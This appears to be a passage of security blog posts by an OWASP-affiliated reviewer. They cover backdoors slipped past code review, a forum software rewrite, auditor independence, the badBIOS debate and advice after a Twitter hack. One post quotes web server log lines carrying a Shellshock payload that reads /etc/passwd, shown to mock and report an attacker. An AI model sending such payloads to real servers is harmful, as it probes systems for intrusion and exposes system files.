On backdoors and malicious code

So since the ASVS 3.0 retired much of the malicious code requirements, and after actually doing a line by line search of ~20 kLOC of dense J2EE authentication code, I’ve been thinking about various methods that backdoors might be created and not be findable by both automated and line by line searches.

This obviously has an issue with the recent Juniper revelation that they found a backdoor in the VPN code of their SOHO device firmware. It also feels like the sort of thing that Apple suffered with GOTO FAIL, and Linux suffered a long time ago with the wait4 backdoor.

https://freedom-to-tinker.com/blog/felten/the-linux-backdoor-attempt-of-2003/

So basically, I’ve been thinking that there obviously has to be a group dedicated to obfuscated backdooring. Making code that passes the visual and automated muster of specialists like me. There is probably another group or portion of the same group that sets about gaining sufficient privileges to make these changes without being noticed.

So before anyone goes badBIOS on me, I think it would be useful if we started to learn what malicious coding looks like in every language likely to be backdoored.

We can help prevent these attacks by improving the agile SDLC process, and keeping closer tabs on our repos. We can also make it more difficult to slip these things in if folks stuck to an agreed formatting style that made slipping in these types of attacks much harder, primarily by using automated indentation and linting that detected the lack of block control and assignment during conditionals. Yes, this will make some code visually longer, but we cannot tolerate more backdoors.

I’ve been doing a LOT of agile SDLC security work in the last few years, working WITH the developers on creating actually secure development processes and resilient applications, rather than reviewing the finished product and declaring their babies ugly. The latter does not work. You cannot review your way to building secure applications. We need to work with developers.

This is important as we’re starting to see an explosion in language use. It’s not merely enough to understand how these things are done in C or C++, but any system language, and any up and coming languages, many of whom we have zilch, nada, nothing in the way of automated tools, code quality tools, and specialists familiar with Go, Clojure, Haskell, and any number of other languages I see pop up from time to time.

What I think doesn’t work is line by line reviewing. All of these pieces of code must be have been looked at by many people (the many eyeballs fallacy) and run past a bunch of automated source code analysis tools, and it was “all good”, but it wasn’t really. Who knows how many secure code review specialists like me looked at the code? We need better knowledge and better techniques that development shops can implement. I bet we haven’t seen the last of Juniper style attacks pop up. Most firms are yet to really look through their unloved bastard repos full of code from developers past, present and future.

Time to start rebuilding GaiaBB

In a life a long time ago in early 2002, we had to move Australia’s largest Volkswagen car forum from EzyBoard, which was distributing malicious ads and hard to get rid of pop ups to our users, to our own forum software. After a product selection, I chose XMB, which was (and is) better than all the other free forums out there, such as phpBB (didn’t have attachments until v3/0!), and others.

XMB was a good choice as it had so many features. What I didn’t know is that XMB was full of security holes. XMB started life as a two week effort by a then 14 year old, who had limited capabilities in writing secure software. If you looked at the OWASP Top 10 and XMB, XMB had at least one of everything. We had XSS, we had SQL injection, we had access control problems, we had authentication bypass, we had … you name it, we had it. Boards were being pwned all over. So I started to help XMB, and soon became their security manager.

The story of XMB’s rise and fall is long and complicated, with many machinations over its history. There were multiple changes of lead developer, of which I caused at least once, something I’m not proud of, nor realistically never covered anyone in glory. The original 14 year old was pushed out before I got there, and there were various stories floating around, but one of the interesting things is that as a result of that, a company thought they owned a free software project. I pushed to have our software adopt the GPL, which was accepted at the time, and it’s the only reason that XMB and all its forks including GaiaBB lasted to this day.

XMB was forked relentlessly, being the basis of MyBB and OpenBB, as well as UltimaBB and then GaiaBB. The late 2000’s were not friendly to XMB, with the loss of not only the main development system, but also a change of “ownership” caused much rifts. Then there was another failed fork called UltimateXMB, which initially was a mod central for XMB, but then turned into a fully customized version of XMB like UltimaBB, but closer in database schema to XMB itself. The last fork of XMB, XMB 2, was a last ditch effort to stop it dying, but it failed as well as the last “owner” of XMB decided to use DCMA take down requests, which is illegal as I owned the (C) of many of the files in XMB, as did others – particularly John Briggs and Tularis. That last remnant of the one true tree of XMB can be found XMB Forum 2.

In 2007, I forked XMB with John Briggs, creating UltimaBB, which life was good for a while, we had momentum and it worked better than XMB during those years. After the loss of the XMB master SVN tree, XMB 1.9.5 was resurrected as an effectively a reverted version of UltimaBB. Then life changed for me, with moving the US and having a child, so we parted ways, which was sad at the time for me as I knew what would happen without a strong and active lead developer. Eventually UltimaBB withered too. I had to fork UltimaBB, creating GaiaBB as I needed to keep my car forum Aussieveedubbers alive and secure.

GaiaBB got only just enough love to keep it secure, but it hasn’t kept up. It barely functions on PHP 5.6 and modern browsers render it funny. The technical debt from the basis of 14 year old “modular” code originally written by a 14 year old (header.php and functions.php are both monolithic and stupidly long), it’s time to call time on it.

So I need to start over or find something new for my forum. As I need to keep my skills up with the modern kids writing software today, I’ve decided to make the investment in re-writing the software so I can learn about modern Ajax frameworks, and have a go at writing back end code. No small part of this is that I want to learn about the security measures as a developer as a code reviewer and penetration tester, you can’t talk to developers unless you know how applications are built and tested, and all the compromises that go into making applications actually run.

GaiaBB

So let’s talk about GaiaBB. Compared to most PHP forum software, it’s pretty secure. It’s got all the features you would ever need and then a lot more on top of that. But it’s spaghetti nightmare. It needs a total re-write. It’s not responsive design in any shape or form. Mobile users just can’t use it. There are heaps of bugs that need fixing. There’s no test suite. Database compatibility is not its strong point.

Frontend decision – Polymer

After looking around, I’ve decided that the front end shall be Polymer as it has good anti-XSS controls and is rapidly evolving. It does responsive design like no one’s business. And because Polymer hasn’t got the cruft of some of the alternatives it will make me think harder about the UI design of the forum software.

Back in the day, we crammed as many pixels and features into a small space because that was the thing then. Nowadays, it’s more about paring back to the essentials. This is critical for me as I don’t have the time to put back EVERY feature of GaiaBB, but as I know most features are never used, that’s not a big deal.

Backend considerations

Now, I need to choose a back end language to do the re-write. My requirements are:

  • Must be workable on as many VPS providers as possible as many do not provide a way to run non-PHP applications without difficulty
  • Must be fast to develop, so I am not interested in enterprise style languages which requires hundreds of lines of cruft where one line is actually required
  • Must support RESTful API
  • Must support OAuth authentication as although I can write an identity provider, I am more than willing to allow forum owners integrate our identity with Facebook Connect or Google+.
  • Must be a entity framework for data access. The days of writing SQL queries are done. I want database transparency.
  • Must support writing automated unit and integration tests. This is not optional

So far, I’ve looked at various languages and frameworks, including:

  • PHP. OMG the pain. There are literally no good choices here. You’d think because I have a lot of the business logic already in PHP that this would be a no-brainer, but the reality is that I have terrible code that is untestable.
  • Go. Very interesting choice as it’s a system language that explicitly supports threading and all sorts of use cases. However, it does not necessarily follow that writing backend code in Go is the way to go as I’ve not found a lot of examples that implement restful web services. It’s possible as it’s a system language, but I don’t want to be the bunny doing the hard yards.
  • Groovy and Grails. I have clients who use this, so I am interested from learning the ins and outs as it seems pretty self documenting and fast to write. Uses a JVM
  • Spring. Many clients use this, but I do not like how much glue code Java makes you write to do basic things. Patterns implemented in Spring seem to take forever to provide a level of abstraction that is not required in real life. I want something simpler.

Frameworks I will not consider.

The few remaining XMB, UltimaBB, and GaiaBB forums need to be migrated to something modern, and that requires support. I don’t have time for support, so I am going to exclude a few things now.

  • Python / Django. I don’t write Python. Few clients use it and I don’t want to be figuring out or supporting a Python web service layer.
  • Node.js. I know this was hot a few years ago, but seriously, I need security, and writing a backend in something that does not protect against multi-threaded race conditions is not okay.
  • Ruby on Rails. I was thinking about this for a bit, but honestly, I’ve never had to review a Ruby on Rails application, so re-writing my business logic and entities in this will not give me more insight than using Groovy/Grails, which I do have clients.

At the moment, I’m undecided. I might use Groovy/Grails as it’s literally the simplest choice so far, and supports exactly what I want to do.  That said, Groovy/Grails is starting to lose corporate backing, so I don’t want to use a language that might end up on the scrapheap of history.

What would you do? I’m interested in your point of view if you’ve done something interesting as a RESTful API.

Looking back at 2009 and Predictions for 2015

I looked back at the “predictions” for 2010, a post I wrote five years ago, and found that besides the dramatic increase in mobile assessments this last year or two, the things I was banging on about in 2009 are still issues today:

Developer education is woeful. I recently did an education piece for a developer crowd at a client, and only two of 30 knew what XSS was, and only one of them was aware of OWASP. At least at a University event I did later on in the year, about 20% of the students were aware of OWASP, XSS, SQL injection and security. The other 80% – not so much. I hope I reached them!

Agile security is woeful. When it first came out, I was enthralled by the chance for a SDLC to be secure by default because they wrote tests. Unfortunately, many modern day practitioners felt that all non-functional requirements were in the category of “you ain’t gonna need it“, and so the state of agile SDLC security is just abysmal. There are some shops that get it, but this year, I made the acquaintance of an organisation that prides themselves on being agile thought leaders who told our mutual client they don’t need any of that yucky documentation, up front architecture or design, or indeed any security stuff, such as constraints or filling in the back of the card with non-functional requirements.

Security conferences are still woeful. Not only is there a distinct lack of diversity in many conferences (zero women speakers at Ruxcon for example), very few have “how do we fix this?” talks. Take for example, the recent CCC event in Berlin. The media latched onto talks about biometric security failing (well, duh!) and SS7 insecurity (well, duh! if you’ve EVER done any telco stuff). Where are the talks about sending biometrics to the bottom of the sea with concrete shackles or replacing SS7 with something that the ITU hasn’t interfered with?

Penetration testing still needs to improve. I accept some of the blame here, because I was unable to change the market. They still sell really well. We really need to move on from pen tests as a wasted opportunity cost for actual security. We should be selling hybrid application verifications – code reviews with integrated pen tests to sort the exploitability of vulnerabilities properly. Additionally, the race to the bottom of the barrel with folks selling 1-2 day automated tests as equivalent to a full security verification for as little money as they can. We need a way of identifying weak tests from strong tests so the market can weed out useless checkbox testing. I don’t think red teaming is the answer as it’s a complete rod length check that can cause considerable harm unless performed with specific rules of engagement, that most red team folks would think invalidates a red team exercise.

Secure supply chain is still an incomplete problem. No progress at all since 2009. Until liability is reversed from the unique position that software – unlike all other goods and services is somehow special and needs special protection (which might have been true back in the 70’s during the home brew days), it’s not true today. We are outsourcing and out-tasking more and more every day, and unless the suppliers are required to uphold standard fit for purpose rules that all other manufacturers and suppliers have to do, we are going to get more and more breaches and end of company events. Just remember, you can outsource all you like,  but you can’t out source responsibility. If managers are told “it’s insecure” and take no or futile steps to remediate it, I’m sorry, but these managers are accountable and liable.

At least, due to the rapid adoption of JavaScript frameworks, we are starting to see a decline in traditional XSS. If you don’t know how to attack responsive JSON or XML API based apps and DOM injections, you are missing out on new style XSS. Any time someone tells you that security is hard to adopt because it requires so much refactoring, point them at any responsive app that started out life a long time ago. There’s way more refactoring in changing to responsive design and RESTful API than adding in security.

Again, due to the adoption of frameworks, such as Spring MVC and so on, we are starting to see a slight decline in the number of apps with CSRF and SQL injection issues. SQL injection used to be about 20-35% of all apps I reviewed in the late 2000’s, and now it’s fairly rare. That said, I’ve had some good times in 2014 with SQL injection.

The only predictions I will make for 2015 is a continued move to responsive design, using JavaScript frameworks for web apps, a concerted movement towards mobile first apps, again with a REST backend, and an even greater shift towards cloud, where there is no perimeter firewall. Given the lack of security architecture and coding knowledge out there, we really must work with the frameworks, particularly those on the backend like node.js and others, to protect front end web devs from themselves. Otherwise, 2015 will continue to look much like 2009.

So the best predictions are those you work on to fix. To that end, I was recently elected by the OWASP membership to the Global Board as an At Large member. And if nothing else – I am large!

  • I will work to rebalance our funding from delivering most of OWASP’s funds directly back to the members who are paying us a membership fee who then don’t spend the allocated chapter funds, but instead, become focussed on building OWASP’s relevance and future by spending around 30% building our projects, standards, and training, 30% on outreach, 30%  on membership, and 10% or less for admin overheads.
  • I will work towards ensuring that we talk to industry standards bodies and deal OWASP into the conversation. We can’t really complain about ISO, NIST, or ITU standards if they don’t have security SMEs to help draft these standards, can we?
  • I will work towards redressing the diversity both in terms of gender and region in our conferences, as well as working towards creating a speaker list so that developer conferences can look through to provide invited talks to great local appsec experts. We have so many great speakers with so much to say, but we have to get outside the echo chamber!
  • We have to increase our outreach to universities. We’ve lost the opportunity to train the folks who will become the lead devs and architects in the next 5-10 years, but we can work with the folks coming behind them. Hopefully, we can invest time and effort into addressing outreach to those folks already in the industry in senior/lead developer and architect and business analyst roles, but in terms of immediate bang for buck, we really need to address university level education to the few “ethical hacking” courses (which is a trade qualification), and work on building in security knowledge to the software engineers and comp sci students of the future. Ethical hacking courses have a place … for security experts, but for coders, they are a complete waste of time. Unless you are doing offensive security as your day job, software devs do not need to know how to discover vulnerabilities and code exploits, except in the most general of ways.

It’s an exciting time, and I hope to keep you informed of any wins in this area.

Independence versus conflict of interest in security reviews

I was giving a lecture to some soon to be graduating folks today, and at the end of the class, a student came up and said that he wasn’t allowed to work with auditors because “it was a conflict of interest”.

No, it’s not. And here’s why.

Conflict of interest

It’s only conflict of interest if a developer who wrote the code then reviews the code and declares it free of bugs (or indeed, is honest and declares it full of bugs). In either case, it’s self review, which is a conflict of interest.

The only way the auditor is in a conflict of interest is if the auditor reviews code they wrote. This is self-review.

An interesting corner case that requires further thought is a rare case indeed: I wrote or participated in a bunch of OWASP standards, some of which became bits of other standards and certifications, such as PCI DSS section 6.5. Am I self-reviewing if I reviewing code or applications against these standards?

I think not, because I am not changing the standard to suit the review (which is an independence issue),  and I’m not reviewing the standard (which would be self-review, which is a conflict of interest).

Despite this, for independance reasons where I think an independence in appearance issue might arise, I always put in that I created or had a hand in these various standards. Especially, if I recommend a client to use a standard that I had a hand in.

Independence

Independence is not just an empty word, it’s a promise to our clients that we are not tied to any particular vendor or methodology. We can’t be a trusted advisor if we’re a shill for a third party or are willing to compromise the integrity of review at a customer’s request.

The usual definition of independence is two pronged:

  • Independence in appearance.  If someone thinks that you might be compromised because of affiliations or financial interest, such as if you’ve previously held a job. For example, if you’ve always worked in incident response tool vendors, and then move to a security consultancy, you might feel you are independent, but others might perceive you as having a pro-IR toolset point of view.
  • Independance in actuality. If you own shares or get a financial reward for selling a product, any recommendation you make about recommending that product is suspect. This is the reason I want OWASP to remain vendor neutral.

If either of these prongs are violated, you are not independent. But just as humans are complex, there are many aspects to independence, and I’ve not learnt them all. I know most of the issues, been there got the t-shirt.

If you are independent, there are a few areas of independence that I refuse to relinquish (and I hope you do too!):

  • Scoping questions. I don’t mind customers setting a scope, but I will often argue for the correct scope before we start. Too narrow a scope can railroad a review into giving an answer the client wants, rather than a proper independent review.
  • Review performance independence. If the client tries to make the review so short that I can’t complete my normal review program in an effective manner or they stop me from getting the information I need, or tries to frame negative observations in a lesser or “meh” context, I will resist. I want to ensure that the review is accurate, but not at the expense of performing my methodology or being up to my usual standards.
  • Risk ratings and findings. In the last few years, I’ve had to resist folks trying to force real findings to become unrated opportunities for improvement (by definition all of my findings are such), or trying to reduce risk ratings by arguing with me, or getting words changed to suit a desired outcome. Again, I want the context to be accurate and I will listen to your input / arguments, but only I will write the report and set risk ratings. Otherwise, why bother hiring an external reviewer? You could write your own report set the ratings to suit. It doesn’t work that way.

Does independence always need to be achieved?

My personal view on this has changed over the years. I used to toe the strict party line on independence.

However, sometimes as a reviewer, you can be part of the solution. I personally believe that a good working relationship between the reviewer and the folks who produced the application or code is a good thing. Both parties can learn from working closely together, work out the best approach to resolving issues, and test it rapidly.

As long as the self-review aspect is properly managed, I believe this to be a good path forward. I don’t see this as being any different as a traditional review that recommends fix X, and then reviewing that X has been put into place. However, if the auditor is editing code, that has crossed the line.

Work with the business to document agreed rules of engagement early prior to work commencing. Both parties will get a lot more mileage from a closely cooperative review than a “pay someone to sit in the corner for two weeks” that is the standard fare of our industry.

Conclusion

Working together has obvious independance issues, particularly from an appearance point of view. So to the excellent question from a student today, working tightly with the auditors is not a conflict of interest, but it can be an independence issue if not properly managed by both the business and the reviewer.

Some people don’t get the hint

85.25.242.250 – – [28/Sep/2014:09:20:12 -0400] “GET / HTTP/1.1” 301 281 “-” “() { foo;};echo;/bin/cat /etc/passwd”
85.25.242.250 – – [28/Sep/2014:22:30:48 -0400] “GET / HTTP/1.1” 500 178 “-” “() { foo;};echo;/bin/cat /etc/passwd”

Dear very stupid attacker, you have the opsec of a small kitten who is surprised by his own tail. Reported.

So it’s finally happened

Passwords. Pah.

After running my blog on various virtual hosts and VPSs since 1998, my measures put into place to protect this site and the others on here were insufficient to protect against weak passwords.

Let’s just say that if you are a script kiddy and know all about press.php, tmpfiles.php and others, you have terrible operational security. There will be consequences. That is not a threat.

AppSec EU – DevGuide all day working party! Be a part of it!

Be a part of the upcoming AppSec EU in Cambridge!

Developer Guide Hackathon
Developer Guide Hackathon

 

* UPDATE! Eoin can’t be in two places at once, so our hack-a-thon has moved to Tuesday 24 June. Same room, same bat channel. *

Eoin Keary and myself will be running an all day working party on the Developer Guide On June 24 from 9 AM to 6 PM GMT. The day starts with Eoin giving a DevGuide status update talk, and then we get down with editing and writing. 

I will be working remotely from the end of Eoin’s talk to til 1 pm UK time, and I so I encourage everyone who has an interest in the Devguide to either attend the workshop in person, or consider helping out remotely. Sign up here!

https://www.owasp.org/index.php/Projects_Summit_2014/Working_Sessions/004

My goal is to get the entire text of the OWASP Developer Guide 2.0 ported to the new format at GitHub, and hopefully finish 4 chapters. To participate, you will need a browser and a login to GitHub. You will also probably want a login to Google+ so you can be a part of an “on air” all day hangout so you can ask me anything about the DevGuide, or just chill with other remote participants.

Stop. Just stop.

In the last few weeks, a prominent researcher, Dragos Ruiu (@dragosr) has put his neck out describing some interesting issues with a bunch of his computers. If his indicators of compromise are to be believed (and there is the first problem), we have a significant issue. The problem is the chorus of “It’s not real” “It’s impossible” “It’s fake” is becoming overwhelming without sufficient evidence one way or another. Why are so many folks in our community ready to jump on the negative bandwagon, even if they can’t prove it or simply don’t have enough evidence to say one way or another?

My issue is not “is it true” or “I think it’s true” or “I think it’s false”, it’s that so many info sec “professionals” are basically claiming:

  1. Because I personally can’t verify this issue is true, the issue must be false. QED.

This fails both Logic 101, class 1, and also the scientific method. 

This is not a technical issue, it’s a people issue.

We must support all of our researchers, particularly the wrong ones. This is entirely obvious. If we eat our young and most venerable in front of the world’s media, we will be a laughing stock. Certain “researchers” are used by their journalist “friends” to say very publicly “I think X is a fool for thinking that his computers are suspect”. This is utterly wrong, foolhardy, and works for the click bait articles the J’s write and on their news cycle, not for us.

Not everybody is a viable candidate for having the sample. In my view, the only folks who should have a sample of this thing are those who have sufficient operational security and budget to brick and then utterly destroy at least two or twenty computers in a safe environment. That doesn’t describe many labs. And even then, you should have a good reason for having it. I consider the sample described to needing the electronic equivalent of Level PC4 bio labs. Most labs are not PC4, and I bet most of infosec computing labs are not anywhere near capable of hosting this sample.

Not one of us has all of the skills required to look at this thing. The only way this can be made to work is by working together, pulling together E.Eng folks with the sort of expensive equipment only a well funded organisation or a university lab might muster, microcontroller freaks, firmware folks, CPU microcode folks, USB folks, file system folks, assembly language folks, audio folks, forensic folks, malware folks, folks who are good at certain types of Windows font malware, and so on. There is not a single human being alive who can do it all. It’s no surprise to me that Dragos has struggled to get a reproducible but sterile sample out. I bet most of us would have failed, too.

We must respect and use the scientific method. The scientific method is well tested and true. We must rule out confirmation bias, we must rule out just “well, a $0.10 audio chip will do that as most of them are paired with $0.05 speakers and most of the time it doesn’t matter”. I actually don’t care if this thing is real or not. If it’s real, there will be patches. If it’s not real, it doesn’t matter. I do care about the scientific method, and it’s lack of application in our research community. We aren’t researchers for the most part, and I find it frustrating that most of us don’t seem to understand the very basic steps of careful lab work and repeating important experiments.

We must allow sufficient time to allow the researchers to collaborate and either have a positive or negative result, analyse their findings and report back to us. Again, I come back to our journalist “friends”, who can’t live without conflict. The 24 hour news cycle is their problem, not our problem. We have Twitter or Google Plus or conferences. Have some respect and wait a little before running to the nearest J “friends” and bleating “It’s an obvious fake”.

We owe a debt to folks like Dragos who have odd results, and who are brave enough to report them publicly. Odd results are what pushes us forward as an industry. Cryptoanalysis wouldn’t exist without them. If we make it hard or impossible for respected folks like Dragos to report odd results, imagine what will happen the next time? What happens if it’s someone without much of a reputation? We need a framework to collaborate, not to tear each other down.

Our industry’s story is not the story about the little boy who cried wolf. We are (or should be) more mature than a child’s nursery rhyme. Have some respect for our profession, and work with researchers, not sully their name (and yours and mine) by announcing before you have proof that something’s not quite right. If anything, we must celebrate negative results every bit as much as positive results, because I don’t know about you, but I work a lot harder when I know an app is hardened. I try every trick in the book, including the stuff that is bleeding edge as a virtual masterclass in our field. I bet Dragos has given this the sort of inspection that only the most ardent forensic researcher might have done. If he hasn’t gotten that far, it’s either sufficiently advanced to be indistinguishable from magic, or he needs help to let us understand what is actually there. I bet that few of us could have gotten as far as Dragos has.

To me, we must step back, work together as an industry – ask Dragos: “What do you need?” “How can we help?” and if that’s “Give me time”, then let’s step back and give him time. If it’s a USB circuit analyser or a microcontroller dev system and plus some mad soldering skills, well, help him, not tear him down. Dragos has shown he has sufficient operational security to research another 12-24 months on this one. We don’t need to know now, now, or now. We gain nothing by trashing his name.

Just stop. Stop trashing our industry, and let’s work together.

So your Twitter has been hacked. Now what?

So I’m getting a lot of Twitter spam with links to install bad crap on my computer.

More than just occasionally, these DM’s are sent by folks in the infosec field. They should know better than to click unknown links without taking precautions.

So what do you need to do?

Simple. Follow these basic NIST approved rules:

Contain – find out how many of your computers are infected. If you don’t know how to do this, assume they’re all suspect, and ask your family’s tech support. I know you all know the geek in the family, as it’s often me.

Eradicate – Clean up the mess. Sometimes, you can just use anti-virus to clean it up, other times, you need to take drastic action, such as a complete re-install. As I run a Mac household with a single Windows box (the wife’s), I’m moderately safe as I have very good operational security skills. If you’re running Windows, it’s time for Windows 8, or if you don’t like Windows 8, Windows 7 with IE 10.

Recover – If you need to re-install, you had backups, right? Restore them. Get everything back the way you like it.

  • Use the latest operating system. Windows XP has six months left on the clock. Upgrade to Windows 7 or 8. MacOS X 10.8 is a good upgrade if you’re still stuck on an older version. There is no reason not to upgrade. On Linux or your favorite alternative OS, there is zero reason not to use the latest LTS or latest released version. I make sure I live within my home directory, and have a list of packages I like to install on every new Linux install, so I’m productive in Linux about 20-30 minutes after installation.
  • Patch all your systems with all of the latest patches. If you’re not good with this, enable automatic updates so it just happens for you automatically. You may need to reboot occasionally, so do so if your computer is asking you to do that. On Windows 8, it only takes 20 or so seconds. On MacOS X, it even remembers which apps and documents were open.
  • Use a safer browser. Use IE 10. Use the latest Firefox. Use the latest Chrome. Don’t use older browsers or you will get owned.
  • On a trusted device, preferably one that has been completely re-installed, it’s time to change ALL of your passwords as they are ALL compromised unless proven otherwise. I use a password manager. I like KeePass X, 1Password, and a few others. None of my accounts shares a password with any other account, and they’re all ridiculously strong. 
  • Protect your password manager. Make sure you have practiced backing up and restoring your password file. I’ve got it sprinkled around in a few trusted places so that I can recover my life if something bad was to happen to any single or even a few devices.
  • Backups. I know, right? It’s always fun until all your data and life is gone. Backup, backup, backup! There are great tools out there – Time Capsule for Mac, Rebit for Windows, rsync for Unix types.

Learn and improve. It’s important to make sure that your Twitter feed remains your Twitter feed and in fact, all of your other accounts, too.

I never use real data for questions and answers, such as my mother’s maiden name as that’s a public record, or my birth date, which like everyone else, I celebrate once per year and thus you could work it out if you met me even randomly at the right time of the year. These are shared knowledge questions, and thus an attacker can use that to bypass Twitter, Google’s and Facebook’s security settings. I either make it up or just insert a random value. For something low security like a newspaper login or similar, I don’t track these random values as I have my password manager to keep track of the actual password. For high value sites, I will record the random value to “What’s your favorite sports team”. It’s always fun reading out 25 characters of gibberish to a call centre in a developing country.

Last word

I might make a detailed assessment of the DM spam I’m getting, but honestly, it’s so amateur hour I can’t really be bothered. There is no “advanced” persistent threat here – these guys are really “why try harder?” when folks don’t undertake even the most basic of self protection.

Lastly – “don’t click shit“. If you don’t know the person or the URL seems hinky, don’t click it.

That goes double for infosec pros. You know better, or you will just after you click the link in Incognito / private mode. Instead, why not fire up that vulnerable but isolated XP throw away VM with a MITM proxy and do it properly if you really insist on getting pwned. If you don’t have time for that, don’t click shit.

Infosec apostasy

I’ve been mulling this one over for a while. And honestly, after a post to an internal global mail list at work putting forward my ideas, I’ve come to realise there are at least two camps in information security:

  • Those who aim via various usual suspects to protect things
  • Those who aim via various often controversial and novel means to protect people 

Think about this for one second. If your compliance program is entirely around protecting critical data assets, you’re protecting things. If your infosec program is about reducing fraud, building resilience, or reducing harmful events, you’re protecting people, often from themselves.

I didn’t think my rather longish post, which brought together the ideas of the information swarm (it’s there, deal with it), information security asymmetry and pets/cattle (I rather like this one), would land with the heavy thud akin to 95 bullet points nailed to the church door.

So I started thinking – why do people still promulgate stupid policies that have no bearing on evidence? Why do people still believe that policies, standards, and spending squillions on edge and end point protection when it is trivial to break it?

Faith.

Faith in our dads and grand dads that their received wisdom is appropriate for today’s conditions.

Si Dieu n’existait pas, il faudrait l’inventer” Voltaire

(Often mis-translated as “if religion did not exist, it would be necessary to create it”, but close enough for my purposes)

I think we’re seeing the beginning of infosec religion, where it is not acceptable to speak up against unthinking enforcement of hand me down policies like 30 day password resets or absurd password complexity, where it is impossible to ask for reasonable alternatives when you attempt to rule out the imbecilic alternatives like basic authentication headers.

We cannot expect everyone using IT to do it right, or have high levels of operational security. Folks often have a quizzical laugh at my rather large random password collection and use of virtual machines to isolate Java and an icky SOE. But you know what? When Linked In got pwned, I had zero fears that my use of Linked In would compromise anything else. I had used a longish random password unique to Linked In. So I could take my time to reset that password, safe in the knowledge that even with the best GPU crackers in existence, the heat death of the universe would come before my password hash was cracked. Plenty of time. Fantastic … for me, and I finally get a pay off for being so paranoid.

But… I don’t check my main OS every day for malware I didn’t create. I don’t check the insides of my various devices for evil maid MITM or keyloggers. Let’s be honest – no one but the ultra paranoid do this, and they don’t get anything done. But infosec purists expect everyone to have a bleached white pristine machine to do things – or else the user is at fault for not maintaining their systems.

We have to stop protecting things and start protecting humans, by creating human friendly, resilient processes with appropriate checks and balances that do not break as soon as a key logger or network sniffer or more to the point, some skill is brought to bear. Security must be agreeable to humans, transparent (as in plain sight as well as easy to follow), equitable, and the user has to be in charge of their identity and linked personas, and ultimately their preferred level of privacy.

I am nailing my colors to the mast – we need to make information technology work for humans. It is our creature, to do with as we want. This human says “no